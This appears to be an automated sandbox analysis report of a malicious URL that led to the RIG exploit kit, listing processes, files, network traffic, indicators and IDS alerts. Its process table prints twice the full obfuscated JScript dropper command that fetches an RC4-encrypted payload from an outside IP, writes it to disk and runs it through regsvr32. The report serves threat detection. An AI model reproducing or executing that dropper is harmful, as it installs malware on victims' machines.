URL: | http://hatscripts.com/addskype |
Full analysis: | https://app.any.run/tasks/c96e4220-e219-46f3-85eb-69a2e4ea7550 |
Verdict: | Malicious activity |
Analysis date: | March 31, 2020, 10:30:54 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MD5: | 1A53DA15EC82B6E1E30C4BDDDD5F1DAA |
SHA1: | B0D6CF3E24F2B919D00F13A794C2134074AC1E59 |
SHA256: | 86AA15EABC8172D6E42E9DCB7508603FA56457F57AAF8C10BE8F1E8BF8DE196B |
SSDEEP: | 3:N1KWE7MVRqIKEH:CW0M7q0H |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2644 | "C:\Program Files\Internet Explorer\iexplore.exe" "http://hatscripts.com/addskype" | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
1168 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2644 CREDAT:267521 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 3221225477 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
1940 | cmd.exe /q /c cd /d "%tmp%" && echo function O(l){var w="pow",j=36;return A.round((A[w](j,l+1)-A.random()*A[w](j,l))).toString(j)["slice"](1)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y./**/WaitForResponse();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript,o="Object",A=Math,a=Function("b","return u.Create"+o+"(b)");P=(""+u).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=u.Arguments,e="WinHTTP",Z="cmd",Q=a("WinHttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=u[P+"FullName"],E="."+p;s.Type=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(31^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xX){};q.Deletefile(K);>1.tmp && stArt wsCripT //B //E:JScript 1.tmp "saN9km3wuzfgdfg" "http://185.43.4.167/?MTQzODY2&oIFdNkOG&IqSFO=difference&RZVfidj=electrical&BnntY=everyone&ztWfPIsi=mustard&blg=neighboring&hGvLns=professional&plztpHosK=abettor&gCWxdj=disagree&TdePiUyB=irreverent&t4gfgfdf4=qLbJWaQbhikyDewZpnohcBwhFpf2o2BXQmESbhp7QrxeMZAN19pGRF7E83VjFkvEXefs&EHWcsNaUX=abettor&f54hgffs=wHfQMvXcJwDHFYbGMvrESKNbNknQA0GPxpH2_drZdZqxKGni2Ob5UUSk6FWCEh3hpPE&gPAediV=irreverent&RAVzQOe=filly&TwxNNTcwMDYz" "¤" | C:\Windows\system32\cmd.exe | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1064 | wsCripT //B //E:JScript 1.tmp "saN9km3wuzfgdfg" "http://185.43.4.167/?MTQzODY2&oIFdNkOG&IqSFO=difference&RZVfidj=electrical&BnntY=everyone&ztWfPIsi=mustard&blg=neighboring&hGvLns=professional&plztpHosK=abettor&gCWxdj=disagree&TdePiUyB=irreverent&t4gfgfdf4=qLbJWaQbhikyDewZpnohcBwhFpf2o2BXQmESbhp7QrxeMZAN19pGRF7E83VjFkvEXefs&EHWcsNaUX=abettor&f54hgffs=wHfQMvXcJwDHFYbGMvrESKNbNknQA0GPxpH2_drZdZqxKGni2Ob5UUSk6FWCEh3hpPE&gPAediV=irreverent&RAVzQOe=filly&TwxNNTcwMDYz" "¤" | C:\Windows\system32\wscript.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
272 | "C:\Windows\System32\cmd.exe" /c regsvr32.exe /s uw9upa34.dll | C:\Windows\System32\cmd.exe | — | wscript.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows Command Processor Exit code: 3 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3772 | regsvr32.exe /s uw9upa34.dll | C:\Windows\system32\regsvr32.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft(C) Register Server Exit code: 3 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3916 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2644 CREDAT:4068620 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 3221225477 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
3028 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2644 CREDAT:3478802 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 0 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
3488 | cmd.exe /q /c cd /d "%tmp%" && echo function O(l){var w="pow",j=36;return A.round((A[w](j,l+1)-A.random()*A[w](j,l))).toString(j)["slice"](1)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y./**/WaitForResponse();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript,o="Object",A=Math,a=Function("b","return u.Create"+o+"(b)");P=(""+u).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=u.Arguments,e="WinHTTP",Z="cmd",Q=a("WinHttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=u[P+"FullName"],E="."+p;s.Type=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(31^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xX){};q.Deletefile(K);>1.tmp && stArt wsCripT //B //E:JScript 1.tmp "saN9km3wuzfgdfg" "http://185.43.4.167/?NDAyMzc1&dLVnee&WiRmw=abettor&uBagg=mustard&NFhybWdr=community&yJo=border&rXKr=irreverent&f54hgffs=w3fQMvXcJxnQFYbGMvzDSKNbNknWHViPxoeG9MildZaqZGX_k7XDfF-qoVvcCgWRxft8L&qKvOEq=everyone&TcNWU=filly&eVvfTlXf=mustard&t4gfgfdf4=7JQOwu1iEWJeA1hn4ZfU11Gpf_82kaDnRPN0pGF9EffYw1E-qKQHLg82Vr0yLYkLYsk9w&McHbYQS=callous&tieW=abettor&gvg=everyone&lnKV=accelerator&awNTyMzU1Nzkw" "¤" | C:\Windows\system32\cmd.exe | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3448 | wsCripT //B //E:JScript 1.tmp "saN9km3wuzfgdfg" "http://185.43.4.167/?NDAyMzc1&dLVnee&WiRmw=abettor&uBagg=mustard&NFhybWdr=community&yJo=border&rXKr=irreverent&f54hgffs=w3fQMvXcJxnQFYbGMvzDSKNbNknWHViPxoeG9MildZaqZGX_k7XDfF-qoVvcCgWRxft8L&qKvOEq=everyone&TcNWU=filly&eVvfTlXf=mustard&t4gfgfdf4=7JQOwu1iEWJeA1hn4ZfU11Gpf_82kaDnRPN0pGF9EffYw1E-qKQHLg82Vr0yLYkLYsk9w&McHbYQS=callous&tieW=abettor&gvg=everyone&lnKV=accelerator&awNTyMzU1Nzkw" "¤" | C:\Windows\system32\wscript.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1168 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\Low\Cab74F9.tmp | — | |
MD5:— | SHA256:— | |||
1168 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\Low\Tar74FA.tmp | — | |
MD5:— | SHA256:— | |||
1168 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\4IT734EV.txt | — | |
MD5:— | SHA256:— | |||
2644 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
1168 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5457A8CE4B2A7499F8299A013B6E1C7C_CBB16B7A61CE4E298043181730D3CE9B | der | |
MD5:FCAB8978DFC89E03C4605B91B9F1C6D0 | SHA256:E8D004CDEAA061C2574F2EA588FD7F923D7D8A810B1CE7BA59BA877CF18F4A03 | |||
1168 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D | der | |
MD5:85C2FF2165EE33525CA83481A1D34237 | SHA256:DB74E85956D511E4B809197EEE82E89106DEADACE38242B714C47C361990F03D | |||
1168 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\MFAQUS6V\WQ37RWQU.htm | binary | |
MD5:347433012A2F3F0100DA3869EA042D9C | SHA256:924126BD8D58DEC36F6E3CDB9114986654660916897087D03B64DC6FDCD896B7 | |||
3916 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\DY534W2X\PJ5UD15E.htm | binary | |
MD5:B0EA96ACC4B90019D57A77535CD3CE28 | SHA256:E7C415DB886A44CD6641D919B4900B9A80C44BD8E5BA42B41F14F5776BBB841A | |||
1168 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5457A8CE4B2A7499F8299A013B6E1C7C_CBB16B7A61CE4E298043181730D3CE9B | binary | |
MD5:62BA3A6CCCE2306CED328719A2A8327B | SHA256:83BFB066C4937190EBA2D3C1AE05B3CBFF0C48A1346F4F20544526E165249CEF | |||
1168 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3FD4FFC3A0CC391E690D565826E5967C | binary | |
MD5:07ED9B724CA8AC3802B04CE084721800 | SHA256:9E036F17BE6A40F06CF586CA4F4DB8F971BA4BC93359AD296ADDE3CE44D93B1C |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1168 | iexplore.exe | GET | 200 | 151.139.128.14:80 | http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEH1bUSa0droR23QWC7xTDac%3D | US | der | 727 b | whitelisted |
1168 | iexplore.exe | GET | 302 | 185.220.35.26:80 | http://cryptomoneyinsider.site/gdte68712?cpm_id=365761694&cpm_cost=0.0022 | unknown | — | — | suspicious |
1168 | iexplore.exe | GET | 302 | 173.192.101.24:80 | http://p238000.infopicked.com/adServe/domainClick?ai=SW638O8pacUtS_ldBgyhBpTSyIczZgkcXtd1fM7xIyjhH2lrXnMnkh75ATebP4SwFVrqfE8eN9gXYM5Pwp2-JP3jsY_hOxPbo17Oq_C2YYolHrl1k_0_osek1CPPi_-NcakkaUIsChYyfOhVm5x7y0PZyADEdsLDP0s6MBsFTTDG6_ipaVE293T8kBtBPpjblyI71uBy5LXJTrvlt7JuIaJWkFFJwO7cU1pxb3PFAKi7xkknbBc1ATxhQCZ3jHf0nhs5VkCzKXfIjioiqjtWE3dLfTADdXX8-I-AMnVxsjOh_mT7TnSprhw5VnIYUcWmwfAUn4IMkXwf5kmd0MUC_Dt8ahIHnyiAUgQqhF2aY5YhYzcek6I_ZB7R8XS5oltF6ME15HHZ8mol_FQFCdABpu0Y1V3DK1_LYPbwW8hssrXv1A8tql3atcNE32FFqfQJJGP0FU6eM45LITCViTWH5hltjPnnWR7AZDnNDfJAAE7SIcvuU3EsYJB5PDS6R6Mk1ENWpjZj46exj0PwWlfnFU6AQkiKqGVWCM44Fw-x8jFUmREz65PZ5xxXFrwZ8TE5dL53LUWHU9T_DZyrVAFVfEhcM9ZyFjF3sj5__MV4XWCiB3FWHMEq7TjcoCMkPvtBPfehADqi6Kugxm5h6JbQ3a9FPDcZEJvUPPTL4O5BA2Kxlu-XFIMyCDgX_vcNp4gZbSSrcqzmByMpcC4h0nZnkyNB1felONExdRePfirJtYMCozyvMhv4-LlU-hBqlV3wbM7TR-A6o2LnrG8E1DfQ9TFH1Jw92wJrgxUUApIdmTWJScwobXG_fQczRqH3vfyD4QLn_pNd8TijIQ6n-5BK5kGhfoFAXzSI8w_UxUCEvTTxS8Ymtt-YjLLE6EbASi2Jh9nfAGWBTqoANFHpJvqyo9347mfhgNbxZuDK-Dk20eQlVRFEktQBWBaf4XymfSdAQOGScGtJTvTwrHjoweW6kMVs93JCm1oFL1MFGZv6CjWFv_aZQC5A4r4FDOdw858tImbOeXz24ZVRY0XLI-w26tWjri88Beg6ZonWe_Vtl9HYgG7afTXkyA&ui=tmxvfbadWlkLtgv3D3v8v0sRZ2xs6kJzLWXp3on882KiNKxwAofaTOAkclPMId75sTlk5A_u9iJ5qRPCRU2Bf6y1MPlOw0E0HOBUOgsVQp5MPyUCqbPIQtj4jUj50FWCdLBACwpV--8&si=1&oref=7b4af67c19877b1fcf0376ba9906a129&rb=nOW5tkIQJf4&rr=0&isco=t | US | — | — | suspicious |
1168 | iexplore.exe | GET | 200 | 151.139.128.14:80 | http://ocsp.sectigo.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRDC9IOTxN6GmyRjyTl2n4yTUczyAQUjYxexFStiuF36Zv5mwXhuAGNYeECEQD1UO%2BwbfMiA%2FILHe8EOtNb | US | der | 472 b | whitelisted |
1168 | iexplore.exe | GET | 302 | 69.16.230.42:80 | http://hatscripts.com/addskype | US | — | — | malicious |
1168 | iexplore.exe | GET | 200 | 151.139.128.14:80 | http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEBPqKHBb9OztDDZjCYBhQzY%3D | US | der | 471 b | whitelisted |
3916 | iexplore.exe | GET | 200 | 185.43.4.167:80 | http://185.43.4.167/?NDgwMTk1&VWUwFGiV&qjiPpuFt=disagree&f54hgffs=xXnQMvWbbRXQA53EKv3cT6NCMVHRFECL2YmdmrHXefjaclWkzrXFTF_7ozKAQwSG6_ttdfJ&UWdvYyKlH=mustard&t4gfgfdf4=YDVLji0WAfQw1mY5UW1kT8aqmjEnUnESb1sXW-0PZZAMUrZWdHeNp31_0yrgkQPsug1TH4GI&Vlv=filly&zglPem=difference&KgZXAxPN=dinamic&GhHCkcAI=disagree&tctbGQwA=abettor&kAbvonjM=neighboring&JPqYagIh=irreverent&FOXklOl=professional&XHWEzo=callous&HDwuUxq=electrical&qLfKrzrUNDA5OTAx | RU | binary | 41.5 Kb | suspicious |
1168 | iexplore.exe | GET | 200 | 185.43.4.167:80 | http://185.43.4.167/?NDgwMTk1&VWUwFGiV&qjiPpuFt=disagree&f54hgffs=xXnQMvWbbRXQA53EKv3cT6NCMVHRFECL2YmdmrHXefjaclWkzrXFTF_7ozKAQwSG6_ttdfJ&UWdvYyKlH=mustard&t4gfgfdf4=YDVLji0WAfQw1mY5UW1kT8aqmjEnUnESb1sXW-0PZZAMUrZWdHeNp31_0yrgkQPsug1TH4GI&Vlv=filly&zglPem=difference&KgZXAxPN=dinamic&GhHCkcAI=disagree&tctbGQwA=abettor&kAbvonjM=neighboring&JPqYagIh=irreverent&FOXklOl=professional&XHWEzo=callous&HDwuUxq=electrical&qLfKrzrUNDA5OTAx | RU | binary | 41.4 Kb | suspicious |
3448 | wscript.exe | GET | 200 | 185.43.4.167:80 | http://185.43.4.167/?NDAyMzc1&dLVnee&WiRmw=abettor&uBagg=mustard&NFhybWdr=community&yJo=border&rXKr=irreverent&f54hgffs=w3fQMvXcJxnQFYbGMvzDSKNbNknWHViPxoeG9MildZaqZGX_k7XDfF-qoVvcCgWRxft8L&qKvOEq=everyone&TcNWU=filly&eVvfTlXf=mustard&t4gfgfdf4=7JQOwu1iEWJeA1hn4ZfU11Gpf_82kaDnRPN0pGF9EffYw1E-qKQHLg82Vr0yLYkLYsk9w&McHbYQS=callous&tieW=abettor&gvg=everyone&lnKV=accelerator&awNTyMzU1Nzkw | RU | binary | 263 Kb | suspicious |
2644 | iexplore.exe | GET | 200 | 185.43.4.167:80 | http://185.43.4.167/favicon.ico | RU | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1168 | iexplore.exe | 185.220.35.26:80 | cryptomoneyinsider.site | — | — | suspicious |
1168 | iexplore.exe | 173.192.101.24:80 | infopicked.com | SoftLayer Technologies Inc. | US | suspicious |
1168 | iexplore.exe | 69.16.230.42:80 | hatscripts.com | Liquid Web, L.L.C | US | malicious |
1168 | iexplore.exe | 185.43.4.167:80 | — | JSC ISPsystem | RU | suspicious |
1168 | iexplore.exe | 173.192.101.24:443 | infopicked.com | SoftLayer Technologies Inc. | US | suspicious |
1168 | iexplore.exe | 151.139.128.14:80 | ocsp.usertrust.com | Highwinds Network Group, Inc. | US | suspicious |
3916 | iexplore.exe | 185.43.4.167:80 | — | JSC ISPsystem | RU | suspicious |
1064 | wscript.exe | 185.43.4.167:80 | — | JSC ISPsystem | RU | suspicious |
— | — | 152.199.19.161:443 | iecvlist.microsoft.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
— | — | 13.107.21.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
hatscripts.com |
| malicious |
infopicked.com |
| whitelisted |
ocsp.usertrust.com |
| whitelisted |
ocsp.sectigo.com |
| whitelisted |
p238000.infopicked.com |
| suspicious |
cryptomoneyinsider.site |
| suspicious |
api.bing.com |
| whitelisted |
www.bing.com |
| whitelisted |
iecvlist.microsoft.com |
| whitelisted |
r20swj13mr.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
1168 | iexplore.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Jun 13 2017 |
1064 | wscript.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2 |
1064 | wscript.exe | Potentially Bad Traffic | ET USER_AGENTS Observed Suspicious UA (xa4) |
3916 | iexplore.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Jun 13 2017 |
3448 | wscript.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2 |
3448 | wscript.exe | Potentially Bad Traffic | ET USER_AGENTS Observed Suspicious UA (xa4) |